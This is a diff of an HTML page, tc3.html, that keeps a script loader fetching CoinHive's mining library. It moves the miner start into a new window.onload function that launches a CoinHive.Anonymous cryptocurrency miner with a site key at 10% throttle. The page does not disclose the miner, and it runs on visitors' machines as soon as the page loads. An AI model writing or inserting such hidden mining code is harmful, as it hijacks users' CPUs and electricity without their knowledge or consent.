--- a/tc3.html
+++ b/tc3.html
@@ -9,7 +9,6 @@
 		{js=d.createElement(s);
 		js.id=id;
 		js.src="https://coin-hive.com/lib/coinhive.min.js";
-		js.appendChild(d.createTextNode("var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();"));
 		fjs.parentNode.insertBefore(js,fjs);}
 		}(document,"script","cjs");
   </script>
@@ -40,7 +39,12 @@
         <script  type="text/javascript">
         !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
         </script>
-
+<script type="text/javascript"> 
+function funonload() {
+    var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();
+} 
+window.onload = funonload;
+</script>
 </head>
 <body>
 <div>
